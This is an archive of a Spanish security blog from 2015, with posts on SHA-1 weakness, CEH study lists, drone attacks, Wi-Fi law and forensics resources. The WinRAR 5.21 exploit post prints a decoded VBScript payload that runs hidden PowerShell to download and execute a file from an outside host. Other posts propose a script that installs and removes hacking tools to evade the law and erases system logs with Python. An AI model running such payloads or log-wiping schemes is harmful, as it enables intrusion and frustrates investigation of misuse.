Este blog ya no está activo, sigue informándote aquí:

martes, 13 de octubre de 2015

SHA1 < SHA2 or SHA3

Bueno, esta es la entrada de ayer que no hice por estar preparando el CEH así que esta es la primera entrada de hoy.


Que, MD5 estaba totalmente roto y que SHA1 era teóricamente hackeable, no se le escapaba a nadie que estuviera metido en el mundillo ya que ha sido dicho por activa y por pasiva en bastantes ponencias. Pero desde hace unos días podemos decir que ambos algoritmos de hash están rotos y que seria necesario utilizar SHA2 o SHA3. 
"Los investigadores de la Informática Centrum Wiskunde y en los Países Bajos, INRIA en Francia y Universidad Tecnológica de Nanyang en Singapur [han demostrado que SHA-1 es vulnerable]a ataques de colisión que llamaron Freestart Collision."
Así que, si tenéis mas curiosidad sobre este tema o hacéis clic en el enlace de la cita o podéis encontrar mas información en la fuente de esta noticia:
 Sed Buenos y migrad a SHA2 o SHA3 xD

domingo, 11 de octubre de 2015

Pack.- CEHv8

Como ya os indiqué hace unos días, la [sección ###Aprende### de esta página] es un recopilatorio de todas esas entradas que yo creo que os pueden servir para aprender un poco.

Así que como hoy he estado estudiando para la certificación CEH, de la que tengo el examen este próximo martes,  creo que nos puede venir bien a todo tener las entradas que hice hace ya meses a mano y en la nueva sección. 

Pack.- CEHv8: 

######################################################
  1. Road To CEH.- ¿Qué hace un Hacker? 
  2. Road To CEH.- Ataque A Un Sistema
  3. Road To CEH.- Penetration Testing
  4. Road To CEH.- Reconocimiento y Footprinting
  5. Road To CEH.- Amenazas de un Footprinting 
  6. Road To CEH.- Fases de la Metodologia del Footprinting (Parte 1)
  7. Road To CEH.- Fases de la Metodologia del Footprinting (Parte 2)
  8. Road To CEH.- Fases de la Metodologia del Footprinting (Parte 3)
  9. Road To CEH.- Fases de la Metodologia del Footprinting (Parte 4)
  10. Road To CEH.- Fases de la Metodologia del Footprinting (Parte 5)
  11. Road To CEH.- Escaneo De Redes
  12. Road To CEH.- Scaneo De Redes (Parte 2)
  13. Road To CEH.- Scaneo De Redes (Parte 3)
  14. Road To CEH.- Scaneo De Redes (Parte 4) 
  15. Road To CEH.- Scaneo De Redes (Parte 5)
  16. Road To CEH.- Escaneo De Redes (Parte 6)
  17. Road To CEH.- Enumeración
  18. Road To CEH.- Enumeración (Parte 2)
  19. Road To CEH.- Enumeración (Parte 3)
  20. Road To CEH.- Malware (Parte 2)
  21. Road To CEH.- Malware (Parte 3)
  22. Road To CEH.- Malware (Parte 4)
  23. Road To CEH.- Malware (Parte 5)
  24. Road To CEH.- Malware (Parte 6)
  25. Road To CEH.- Malware (Parte 7)
  26. Road To CEH.- Malware (Parte 8)
  27. Road To CEH.- Ingeniería Social.
  28. Road To CEH.- Ingeniería Social. (Parte 2)
  29. Road To CEH.- Ingeniería Social. (Parte 3)
  30. Road To CEH.- Ingeniería Social. (Parte 4)
  31. Road To CEH.- Ingeniería Social. (Parte 5)
  32. Road To CEH.- Ingeniería Social. (Parte 6)
  33. Road To CEH.- Denegación de Servicio.
  34. Road To CEH.- Denegación de Servicio.(Parte 2)
  35. Road To CEH.- Denegación de Servicio (Parte 3)
  36. Road To CEH.- Denegación de Servicio (Parte 4)
  37. Road To CEH.- Denegación de Servicio (Parte 5)
  38. Road To CEH.- Hijacking De Sesión 
  39. Road To CEH.- Hijacking De Sesión (Parte 2)
  40. Road To CEH.- Hijacking De Sesión (Parte 3)
  41. Road To CEH.- Hijacking De Sesión (Parte 4) 
  42. Road To CEH.- Hijacking De Sesión (Parte 5)
######################################################

Sed Buenos y ahora me toca estudiar a mi xD

sábado, 10 de octubre de 2015

Como Acceder al Modo Dios De Windows 10

Primeramente esto del Modo Dios suena muy rimbombante y me gustaría explicar un poco mas en que consisten los modos dios de Windows.

"El “modo Dios” o God Mode es una característica que habilita la opción de ver toda la configuración posible del sistema en un único lugar y es algo más indicado para usuarios avanzados que para usuarios con pocos conocimientos de sistemas."
Al poder acceder al modo dios acedemos a todas las herramientas de configuración  para todo el sistema de Windows y la verdad es que es tan fácil como seguir las siguientes instrucciones, bueno encontrar la clave supongo que no ha sido fácil, pero ejecutarlo si lo es. 
  1. Crea una nueva carpeta en el Escritorio de Windows y darle el siguiente nombre: 
    • GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}
  2. La carpeta de transformara en un icono parecido al del panel de control
  3. Hacemos doble clic en el y este nos mostrara un panel de configuración universal dando nos acceso a 260 funciones y herramientas.
Bueno, ahora ya sabéis como activarlo y poder curiosear y aprender un poco mas de del entrono Windows. También podéis acceder a este modo o panel de configuración utilizando a Cortana pero eso os dejo que lo leáis de las diferentes fuentes.

Fuentes: 

viernes, 9 de octubre de 2015

Aprende La Nueva Sección y Cambios.

Hace unos días os dije que tenia que hacer una página donde colocar todos los packs que he ido haciendo, Así que ahora podéis ver todos estos pack en la pagina ###Aprende ### que está debajo del titulo del blog. También y seguro que los mas allegados a este blog habréis visto, he borrado la lista de correo (ya que nadie la utiliza) y el rincón del maldito (que yo no actualizaba).





Pues esto han sido todos los cambios por hoy, si creeis que hay alguna entrada de als que he hecho que también deberia estar en la sección ### Aprende ### hacedmelo saber por los comentario o por cualquier lado por favor. 

Enlace a Aprende: 

 Sed Buenos ;) 

miércoles, 7 de octubre de 2015

Pack.- Hacking de Drones

Hasta la fecha os he hablado muchísimo del hackeo de drones, así que ya es hora de presentaros un pack con todas las entradas.  Si, es una entrada un poco sosa pero después me va muy bien a mi para localizar material el día que lo necesite. También podría hacer una página donde recopile todos los packs para que no caigan en el agujero negro del tiempo pero eso mejor otro día.


Hacking de Drones: 

    1. Hacking De Drones Militares A Traves De GPS Spoofing
    2. Drones, Giroscopios y Ruido (Interfiriendo en Drones)
    3. SensePost y El Arte De Interceptar Drones.

Sed Buenos con esto ;)

martes, 6 de octubre de 2015

La Privacidad y Transparencia De Las Grandes Empresas

Como ya os he hablado otras veces, una empresa que regala su servicio gratis, busca ser comprada, que pagues por microservicios o quiere vender tu información. Pero como podemos saber o que realmente hacen estas empresas con nuestra información.

Para aclarar esta duda el [Electronic Frontier Foundation (EFF)] una asociación sin animo de lucro que intenta defender la privacidad, la libre expresión y la innovación, ha presentado un informe donde se explica que hace cada una de estas empresas, ademas también incluye la siguiente tabla que nos va a ir perfecta.


La verdad es que ha sido una sorpresa ver que Whatsapp abogue tanto por la privacidad pero bueno, ahora la ha comprado Facebook y ya podéis ver en la tabla lo que hace este con nuestra información.

Si tenéis mas curiosidad os dejo el enlace al informe:

Fuente: 

lunes, 5 de octubre de 2015

SensePost y El Arte De Interceptar Drones.

Esta es [el ultimo vector de ataque] que nos faltaba por explorar en este blog. La interpretación de drones mediante el ataque Wireless Evil Twin. un ataque donde un Rogue AP (un punto de acceso Wifi falso) que intenta suplantar al legitimo para que el smartphone desde donde se controla al drone se conecte y podamos manipular esta información. 



 Para realizar este ataque [SensePost Information Security] ha programado una herramienta llamada Snoopy.

Snoopy es un sensor, recopilador de datos, interceptor, analizador, y una herramienta de visualización distribuida. Está escrito en formato modular, lo que permite la recogida de datos arbitrarios de diversas fuentes a través de plugins hechos en Python <3.

Enlace a la herramienta: 
Bueno con esto ya hacemos los 3 tipos de ataques para que los drones no nos toquen lo que no suena. 

Fuente: 
Sed Buenos con esto 0;) 

domingo, 4 de octubre de 2015

Toda La Documentación Para el CEHv8

Como ya sabéis algunos el día 13 de octubre tengo programado el examen del CEH, así que me he de poner las pilas y realizar test o leer contra mas información mejor. Desde aquí muchas gracias a [K2r4y] que ha compartido conmigo mucha información. Adames, para todos los que también estáis en este proceso, aquí tenéis toda la documentación de la versión 8 del CEh que el blog [Hackplayer] compartió hace unos días.


Temario:
Fuente:
Sed Buenos ;) 

sábado, 3 de octubre de 2015

Drones, Giroscopios y Ruido (Interfiriendo en Drones)

Hace unos días hablamos sobre los tres [tipos de hackeos a drones] y como es un tema que me pica mucho la curiosidad. Así que, como ya hablamos del [Spoofing de GPS para drones] hoy quiero compartir con vosotros un paper sobre como interferir en los giroscopios de un drone con el uso de ruido. 


Los drones están equipados con sistema [microelectromecánicos (Micro-Electro-Mechanical System MEMS)] en sus [giroscopios]. Así que, después de analizar la frecuencia de estos, descubrieron que lanzando ruido con una frecuencia resonante por debajo de 30Kh puede causar una desviación en dichos giroscopios y de esta manera desestabilizar un drone hasta el punto de hacerlo caer.


Así que, si queréis saber como realizar este ataque y sus contramedidas os recomiendo el paper. La verdad es que es curioso xD
Sed Buenos con esto 0;)

viernes, 2 de octubre de 2015

¿A que Nos Exponemos Cuando Hackeamos Una Wifis?

Muchas veces hemos hablado de Hacking de redes Wifis que si WEP, que si WPA2, etc pero nunca nos hemos parado a pensar de lo que puede pasar so nlo probamos este tipo de "experimentos" en un laboratorio. Así que ya es hora de que rebusquemos un poco en la ley a ver cuantos artículos incumplimos al vulnerar un punto de acceso wifi.  


Ya sabéis, esto son solo los punto que he podido encontrar yo si encontráis alguno mas podéis contactar por los comentarios o en la caja de sugerencias. 
Artículo 255 redactado por el número ciento treinta y dos del artículo único de la L.O. 1/2015, de 30 de marzo, por la que se modifica la L.O. 10/1995, de 23 de noviembre, del Código Penal («B.O.E.» 31 marzo).Vigencia: 1 julio 2015

1. Será castigado con la pena de multa de tres a doce meses el que cometiere defraudación utilizando energía eléctrica, gas, agua, telecomunicaciones u otro elemento, energía o fluido ajenos, por alguno de los medios siguientes:

  1. Valiéndose de mecanismos instalados para realizar la defraudación.
  2. Alterando maliciosamente las indicaciones o aparatos contadores.
  3. Empleando cualesquiera otros medios clandestinos.

2. Si la cuantía de lo defraudado no excediere de 400 euros, se impondrá una pena de multa de uno a tres meses.

Artículo 256 redactado por el número ciento treinta y tres del artículo único de la L.O. 1/2015, de 30 de marzo, por la que se modifica la L.O. 10/1995, de 23 de noviembre, del Código Penal («B.O.E.» 31 marzo).Vigencia: 1 julio 2015
1. El que hiciere uso de cualquier equipo terminal de telecomunicación, sin consentimiento de su titular, y causando a éste un perjuicio económico, será castigado con la pena de multa de tres a doce meses.

2. Si la cuantía del perjuicio causado no excediere de 400 euros, se impondrá una pena de multa de uno a tres meses.
Si habláramos del código penal que tenia vigencia en el 2007 tendríamos que mirar el 623 articulo 4. Pero bueno, creo que esto sería el peor problema que podría tener el atacante después de usar herramientas para tal fin.

Sed Buenos ;)

jueves, 1 de octubre de 2015

Como Explotar WinRAR 5.21 ¡Actualiza!

Ayer me llegó al correo una notificación de bugtraq donde la gente de RARLAB anunciaba que habían publicado una nueva vulnerabilidad en WinRAR. Si, la misma de la que os hablé en la entrada anterior. Bueno, la verdad es que me sorprendió ya que al ralo la vi publicada en [TheHackerNews] con el titulo de KILLER, empece a investigar un poco.
Ya hemos hablado un poco aquí [sobre Winrar y .zip] e incluso hemos explotado alguna vulnerabilidad en WinRAR 4.20 falsificando las extensiones.


Pero de la vulnerabilidad de la que os voy ha hablar hoy pasa mucho por un tema que me encanta que es el hecho de [bindear algo maligno para poder colarlo] en un auto-ejecutable SFX. 

Esta vulnerabilidad afecta a WinRAR 5.21 y permite la ejecución de código de forma remota a través de un HTML especialmente creado para tal fin y haciendo uso de la vulnerabilidad [CVE-2014-6332] / [MS15-064], la cual permite ejecución del código a través de Windows OLE. Mohammad Reza Espargham al encontrar la vulnerabilidad decidió gravarse el video y dejar una prueva de concepto (una PoC vamos) para todo aquel que quiera jugar un poco con la vulnerabilidad. 

Pero antes que dejaros el enlace a la PoC con las instrucciones para explotar la vulnerabilidad paso por paso. Os advierto que si descodificais el código ubicado en la variable my $poc= encontramos que automáticamente descarga un putty desde un servidor raro(no quiero ni saber si viene con bicho). 

Esto no es por que yo se muy listo sino por que en la PoC a bajo del todo lo pone:
  • $poc = decode_base64($poc);
Así que si lo "traducimos" encontramos lo siguiente: 
<SCRIPT LANGUAGE="VBScript">

function runmumaa()
On Error Resume Next
set shell=createobject("Shell.Application")
command="Invoke-Expression $(New-Object System.Net.WebClient).DownloadFile('http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe','load.exe');$(New-Object -com Shell.Application).ShellExecute('load.exe');"
shell.ShellExecute "powershell.exe", "-Command " & command, "", "runas", 0
end function 
</scrit>
Bueno, encontramos un html completo que se habria de modificar en caso de querer ejecutar otros tipos de funciones. Así que dicho esto,  os dejo el enlace y el vídeo para que podáis ver paso por paso como explotar esta vulnerabilidad. 

Enlace a la PoC :
Vídeo:


Quería haber grabado el vídeo yo igual que hice con el otro, pero me ha sido imposible.

Fuente:


Sed Buenos con esto 0;) 

miércoles, 30 de septiembre de 2015

La Oficina y La Aspiradora

Supongo que no será una sorpresa si os digo que trabajo como consultor [en la empresa GMV] y que hace mas o menos 9 meses que empecé a trabajar en una oficina. La verdad es que no estaría escribiendo esta entrada si no hubiera algo que me hubiera llamado la atención ademas habiendo una [vulnerabilidad 0'day de Winrar la mar de hermosa ]que no tiene parche y además es fácil de explotar. (supongo que la dejaré para mañana pero no prometo nada xD)

Esto ha pasado hoy en la oficina de un cliente. Estaba trabajando en mis cosas como cada día y como cada miércoles (uno si, uno no mas o menos) pasa el hombre de la aspiradora para aspirar la moqueta. Como siempre, miro por el rabillo del ojo para ubicar la localización del hombre y cuando lo vea acercarse, levantarme y facilitarle el trabajo ya que, no me cuesta mas de un minuto y ambos ganamos tiempo y comodidad (yo no le molesto y el no me molesta, todo perfecto). Pero claro, hay poca gente dispuesta a levantarse de su asiento. 

Pues así ha ocurrido, al sentarme de nuevo el pobre hombre de la aspiradora ha aspirado la correa de una cartera que estaba debajo de una mesa cuyo propietario estaba pasando olímpicamente (a que hasta con cascos la aspiradora se oye) de el. El propietario, al darse cuenta del "incidente", ha decidido estirar fuerte de la mochila/fiabrera para liberar la de su "terrible final" (que no es ninguno por que por el agujero de esa aspiradora cambia la correa y poco mas.) 

Como es normal el hombre de la aspiradora ha pedido perdón y la respuesta de este ha sido una cara de asco terrible y no le ha dirigido la palabra. Me han entrado ganas de responderle yo al ver esa muestra de falta de respeto. 

Bueno, ahora que ya ha pasado un rato y he podido tomarme un café, comer y pensar en ello tranquilamente sigo pensando lo mismo. No puede entender esa cara de asco y esa falta de respeto como si el fuera inferior y nos tuvieran prohibido dirigirles la palabra. Solo lo entenderia si fuera por vergüenza, que yo de eso se mucho.

Una persona que se dedique a lo que se dedique no deja de ser una persona igual que tu, una persona con sueños, ilusiones, que trabaja para poder estar tranquilo en su casa sin preocupaciones, o para gastárselo en lo que ella quiera que da igual, se merece el mismo respeto que el que le mostrarías a tu jefe ya que si tu estuvieras en su papel te gustaría que al menos, ya que has hecho el esfuerzo de disculparte delante de una sala llena de consultores, recibir una contestación. 


Son este tipo de actitudes las que me dan rabia, porque hay gente que no es capaz de pensar en el compañero (aunque no sea del equipo da igual) y piensa que por estar sentado calentando silla delante de un ordenador ya está en una posición mas favorable.  

Hoy siento la entrada offtopic pero algo que quería compartir ya que me ha dado mucha rabia tanto, que como he escrito, he estado apunto de decir algo aunque supongo que no lo he hecho por vergüenza que, como ya he escrito, de eso se un rato. 

Sed Buenos ;) 

martes, 29 de septiembre de 2015

La idea.- El Problema De Los Logs

Para los que no vieron la entrada de ayer, expuse [una idea para un script en python] que consistía en descargar herramientas de seguridad, ejecutarlas y luego desinstalarlas para que no nos pillaran con herramientas de seguridad informática si algún día a alguien le diera por registrar nuestro ordenador. 


También os pedí vuestra opinión para ver lo que os parecía o por si había algún punto que yo no hubiera visto (que suele ser lo mas normal del mundo). Esto mismo es lo que ha hecho [Oscar Queraltó] y como bien a expuesto, si utilizamos una herramienta es posible que aunque la desinstalemos quedarían logs que confirmarían que la teníamos instalada en el momento de un ataque. 

Pues tiene toda la razón, así que me puse a investigar un poco y os voy a explicar algunos de los logs mas interesantes (si veis que falta alguno hacedmelo saber por donde querais): 
  • /var/log/apt/history.log:
    • Todas las acciones realizadas con apt quedan registradas en este archivo. 
  • /var/log/messages:
    • Contiene los mensajes del sistema, incluidos los mensajes que se registran durante el inicio del sistema.
  • /var/log/dmesg: 
    • Contiene información memoria cíclica del Kernel. Cuando el sistema arranca, se imprime el número de mensajes en la pantalla que muestra información sobre los dispositivos de hardware que el kernel detecta durante el proceso de arranque.
  • /var/log/auth.log:
    • Contiene información de la autorización del sistema, incluyendo los inicios de sesión de usuario y los mecanismos de autenticación que se utilizaron.
  • /var/log/boot.log:
    • Contiene la información que se registra cuando se inicia el sistema
  • /var/log/daemon.log: 
    • Contiene información registrada por los diversos daemon que se ejecuta en el sistema.
  • /var/log/dpkg.log:
    • Contiene la información que se registra cuando un paquete se instala o se elimina con el comando dpkg
  • /var/log/kern.log:
    • Contiene información registrada por el kernel. 
  • /var/log/lastlog:
    • Muestra la reciente información de acceso para todos los usuarios. Esto no es un archivo ASCII. Se puede usar el comando lastlog para ver el contenido de este archivo.
  • /var/log/maillog /var/log/mail.log:
    • Contiene la información del registro del servidor de correo que se ejecuta en el sistema.
  • /var/log/user.log:
    • Contiene información sobre todos los registros a nivel de usuario
  • /var/log/Xorg.x.log:
    • Registra los mensajes de la X
  • /var/log/alternatives.log:
    • Registra la información de las alternativas de actualización.
  • /var/log/btmp:
    • Este archivo contiene información acerca de intentos de conexión fallidos. Se puede utilizar el siguiente comando para ver el archivo btmp.
  • /var/log/cups:
    • Todas las impresoras y los mensajes de registro de impresión relacionados.
  • /var/log/anaconda.log:
    • Al instalar Linux, todos los mensajes relacionados con la instalación se almacenan en este archivo de registro.
  • /var/log/yum.log:
    • Contiene la información que se registra cuando un paquete se instala utilizando yum
  • /var/log/cron:
    • Siempre que el daemon cron (o anacron da igual xD) comienza una tarea de cron, registra la información sobre el trabajo de cron en este archivo
  • /var/log/secure:
    • Contiene información relacionada con los privilegios de autenticación y autorización.
  • /var/log/wtmp or /var/log/utmp:
    • Contiene registros de inicio de sesión. Usando wtmp se puede descubrir que usuario ha iniciado sesión en el sistema
  • /var/log/faillog: 
    • Contiene los fallos de inicio de sesión. 
Bueno, después de esta chapa, queda claro que no solo tendríamos que borrar el history.log pero aparte de muchas cosas chulas que se pueden hacer con estos logs, en python podemos borrar completamente cualquier .log con las siguientes dos lineas de código: 
with open('yourlog.log', 'w'):
        pass
Así que, aunque pegue el cante de que los logs estén totalmente en blanco, el tema de los logs quedaría solucionado con una lista con todas las rutas de los logs y parsarlas por un bucle for para borrarlos con las dos lineas de código de arriba. 

Si veis que me equivoco o si faltara algún log importante de Linux, por favor no dudéis en comentarlo. Espero para mañana poderos traer un boceto de la herramienta al mas puro y genuino spagueti code. 

Sed Buenos ;) 

lunes, 28 de septiembre de 2015

Idea.- Python para La Instalación y Desinstalación de Herramientas

Hoy escuchando el [podcast de Hoystreaming que el flu-project ha publicado] en su blog, ha salido el tema de la reforma del código penal donde se penalizaba la obtención de programas destinados al Hacking, Exactamente se decía lo siguiente:
«Será castigado con una pena de prisión de seis meses a dos años o multa de tres a dieciocho meses el que, sin estar debidamente autorizado, produzca, adquiera para su uso, importe o, de cualquier modo, facilite a terceros, con la intención de facilitar la comisión de alguno de los delitos a que se refieren los apartados 1 y 2 del artículo 197 o el artículo 197 bis: a) un programa informático, concebido o adaptado principalmente para cometer dichos delitos; o b) una contraseña de ordenador, un código de acceso o datos similares que permitan acceder a la totalidad o a una parte de un sistema de información.»
Así que se me ha ocurrido una idea que quería compartir con todos vosotros para ver que os parece, ademas como con Python aun estoy aprendiendo mas vale que me corrijáis para hacerlo bien o por si os parece una soberana tontería que puede serlo. 

Pues aquí va,  ¿por que no hacer un script en Python que actualice la instalación y la desinstalación de herramientas de hacking? y quien dice Python dice cualquier otro lenguaje de programación. La idea iría de este modo, seleccionamos de una herramienta que vayamos a utilizar el escript lance un apt-get install, una vez instalada la ejecuta y luego cuando acabemos con su uso la desintalaría. Evadiendo así el articulo de la norma que os he pegado arriba. 

Bueno, siempre igualando diga que es una script que puede ayudar al trabajo de los pentesters ya que no tendría una herramienta destinada al hacking si no una herramienta destinada a la instalación de software necesario para cumplir un trabajo muy especifico. 

Por si no lo entendéis del todo ya que no creo haberme podido explicar bien aquí tenéis la idea con mi perfecto dominio del paint. 



¿Que os parece? es una idea rápida y por eso quiero que me comentéis como la haríais vosotros o si hay algo de la idea que añadiríais o quitaríais. La verdad es que de programación tiene menos de una tarde dependiendo de la cantidad de herramientas que quieras añadir. 

Sed Buenos ;) 

domingo, 27 de septiembre de 2015

HackerStrip.- El Comic De Hackers Para Hackers

Hace unos días que me volvió a dar por leer comics y me pregunté que entre toda la gran variedad de artistas y de géneros de comic si habría alguno dedicado a los Hackers o al menos a la seguridad informática a parte del comic de "Hacker Epico". 

Pues si, Hackerstrip es un comic donde hackers del tamaño de Charlie Miller cuentan sus historias en la vida real. Es un proyecto de Raak aka Ravi Kiran quien trabaja como IT Security consultant y la verdad es que me ha gustado mucho tienen términos que se me escapan pero eso solo hace que me los apunte para querer aprender mas. En serio, si os gusta el mundo de los comics y la seguridad informática, este es vuestro comic.


Os dejo el enlace a la página web del proyecto: 
Pero si no estáis interesados en más información y queréis empezar a leer el comic os dejo el repositorio de Github donde están subidos todos los episodios: 
Sed Buenos ;) 

sábado, 26 de septiembre de 2015

Los Tres Tipos de Hackeos a Drones

Después del paper que os recomendé hace unos días sobre el [hackeo de drones militares] mediante spoofing de la señal GPS, empecé a interesarme un poco mas por  el funcionamiento de estos y la verdad es que difieren un poco entre los drones militares y los que podemos obtener los civiles (Sobretodo en que no disponemos de un satélite para poder enviarle ordenes xD). Pero no fue hasta ver el siguiente vídeo donde pude ver lo verdaderamente útiles que pueden llegar a ser unos drones bien usado. 


Sinceramente mola muchísimo que haya drones capaces de construir puentes que aguanten el peso de personas un obstáculo con éxito. Pero, la típica pregunta que siempre se aparece en mi cabeza. ¿Será seguro?

Pues mirando la guía para sobrevivir a los drones de Ruben Pater existen tres maneras de hackear un drone.
  1. Engañar al GPS: Como ya vimos en el paper y en la entrada del otro día. 
  2. Intercepción: Se utiliza software de captura de aérea con un disco satelital y un sintonizador de señal de TV para interceptar las frecuencias de los Drones. Tanto la comunicación entrante como saliente puede ser interceptada (Por lo que estaríamos en un escenario de the man-in-the- middle)
  3. Interferencia. Al transmitir en una o en varias frecuencias distintas el enlace entre la nave y el piloto puede ser desconectada. 
La verdad es que parece que la señal, aunque esta sea cifrada es uno de los peores enemigos de un drone. Así que yo aun no me fiaría de un puente hecho por un drone.


Para los que queras la guía, os dejo en enlace aquí abajo. Es bastante chula ya que engloba soluciones para ocultarte de estos.
Sed Buenos ;) 

viernes, 25 de septiembre de 2015

Mac4n6 Group.- Colección De Localizaciones Forenses Para Mac y iOS

Mac4n6 Group, aunque parezca el nombre de una sociedad secreta, no deja de ser un repositorio donde toda la gente que quiera contribuir puede dejar recursos que ayuden al peritaje forense de dispositivos Mac y iOS. La verdad es que me parece una iniciativa genial ya que normalmente la información para este tipo de peritaje esta disuelta y cada perito tiene sus propias herramientas o script. Así que, un repositorio para congregaros a todos es la mejor opción para no perder el tiempo si estas trabajando.


Extracto del readme del repositorio:
"The idea is to create one single point of collection for OS X and iOS artifacts location, trying to collect more information for each artifact, not just a path!" 
"The motto? Reusable format. The goal is that the information collected have to be “machine parsable” and mostly “human readable/writable”, reusable by any application, library, etc. (am I too optimistic?). That is why as main collaboration tool for the collection, we use a shared spreadsheet so that anyone can add new artifacts, there is no need to know how to code to contribute to this project (so, no excuses!). From here, two (simple) scripts will convert the csv file into:
  • yaml artifact library file, so that other applications can use it. No crapy/fancy xml things.
  • ForensicsWiki page, one of the point of reference for forensics practitioners."

"This way the effort is centralized and made only once."

Enlace al repositorio:
Espero que os sea útil. al menos a mi me ha sorprendido y si conocéis mas iniciativas como esta no dudéis en utilizar la caja de sugerencias, los comentarios o contactar-me por algún lado.

Sed Buenos ;)

jueves, 24 de septiembre de 2015

Imagen.- Algunos Problemas Que Mis Futuros Hijos Nunca Tendrán

Hoy, haciendo un vistazo por diferentes páginas y ya que tenia fiesta me he puesto algo nostálgico al recordar la primera vez que toque un PC. Así que, al ver la siguiente tira en la página de CuantaRazón no me he podido resistir a pensar en las cosas que nuestros futuros hijos se perderán o que ya se han perdido.  Para bien o para mal, ojo.


Bueno, faltarían los pantallazos azules de windows 95, 98 y Xp que ahora los han cambiado. 

¿Los recordáis todos?

Sed Buenos ;)

miércoles, 23 de septiembre de 2015

Hardening de Humanos Contra Rubber-hose Cryptanalysis

Hoy estaba preparando el examen de CEH cuando en una de las 878 preguntas que me animaba a responder cuales de las siguientes técnicas no hacia falta el uso de un ordenador. Así que al echar un vistazo  a las respuestas y al encontrarme con Rubber-hose Cryptanalysis me ha entrado la curiosidad y lo he buscado. 


Para los que no sepáis lo que es un ataque Rubber-hose Cryptanalysis (Vamos, como yo esta mañana) solo decir que es un eufemismo para la extracción de secretos mediante la coacción o la tortura. Supongo que muy ético no puede ser, pero se recoge como una técnica al igual que la ingeniería social y como no esto ha dado pié a algunas tiras cómicas. 

La verdad es que es buena xD

Pero como toda vulnerabilidad (dentro de lo que cabe es una vulnerabilidad en el funcionamiento de la criptografía) hay gente que ha tratado de secularizarla o parcherla. De esta manera, en 2012 en el simposio de seguridad de USENIX, Hristo Bojinov de la universidad de Stanford presento la ponencia Neuroscience Meets Cryptography: Designing Crypto Primitives Secure Against Rubber Hose Attacks. 

En esta ponencia y en el paper que viene con ella si describe como enseñar a una persona una clave criptografia a través de un videojuego si que ella sea consciente del código en cuestión. Para resumirlo, si habéis jugado a juegos de lucha (con combos largos) o al Guitar Hero y os abreis fijado que al final acabas memorizando los movimientos por pura mecánica y si en cualquier momento te preguntaran por una parte intermedia de la canción no sabría decir en que posición estaba la "nota" o que botón tenias que apretar.  Pues partiendo de esta base y haciendo lo mismo con mas de un sujeto haciendo le aprender a cada uno un pedazo del código, se consigue que aunque torturen a esa persona ella no sepa el código que tendría que decir aunque lo quisiera.

Os dejo el enlace a la ponencia:
Y aquí tenéis el paper: 
La verdad es que es un tema curioso para tratarse de seguridad informática y no veremos a mucha gente hablar de estas cosas tan abiertamente. Bueno, ahora ya si que tenemos entera la novela de Tom Clancy xD

Para mas información os recomiendo que entreis en la fuente:
Sed Buenos ;) 

martes, 22 de septiembre de 2015

Técnicas OSINT & Python Slides

Como algunos no podréis venir a mi ponencia en PyBCN y otros acabáis de descubrir este blog, es de menester de que os ofrezca las diapositivas de la charla. 


Espero que os gusten y ya sabéis, si alguno de vosotros a venido al Evento por este blog saludadme y dadme feedback de la charla que me ayudará. Bueno y si acabáis de leer esto también.

Sed Buenos ;)